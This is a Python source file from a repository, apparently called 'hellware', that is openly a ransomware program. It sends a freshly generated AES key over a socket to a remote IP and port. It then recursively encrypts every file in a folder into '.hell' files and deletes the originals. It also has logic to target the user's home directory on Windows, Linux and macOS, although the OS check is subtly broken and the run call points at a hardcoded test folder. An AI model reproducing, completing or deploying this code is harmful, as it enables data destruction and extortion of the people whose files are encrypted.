Files
hellware/ransomware.py
T
2024-08-23 17:54:31 +03:00

61 lines
1.8 KiB
Python

import os
import socket
import getpass
import platform
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad
# We create a socket to send the encryption key to a remote server
def send_key(key):
host = "192.168.0.155"
port = 8092
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(key)
print("Key sent")
s.shutdown(2)
s.close()
# Function to encrypt a file and removing the unencrypted one
def encrypt_file(file, key, iv):
cipher = AES.new(key, AES.MODE_CBC, iv)
file_name = file
with open(file, 'rb') as file:
plaintext = file.read()
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
with open(file_name + ".hell", "wb") as enc_file:
enc_file.write(iv + ciphertext)
os.remove(file)
# This will go through the specified folder and encrypt all of the files, even from subfolders
def encrypt_whole(folder_path):
key = get_random_bytes(32)
iv = get_random_bytes(16)
send_key(key)
for root, _, files in os.walk(folder_path):
for file_name in files:
file_path = os.path.join(root, file_name)
encrypt_file(file_path, key, iv)
print(f"Encrypted: {file_path}")
# Main function
# Detects username, assembles path and calls function from above to encrypt
if __name__ == "__main__":
username = getpass.getuser()
path = ''
if platform.system == "Windows":
path = r'C:\Users\%s' % username
elif platform.system == "Linux":
path = '/home/' + username
elif platform.system == "Darwin":
path = '/Users/' + username
encrypt_whole("/home/hellisabove/test")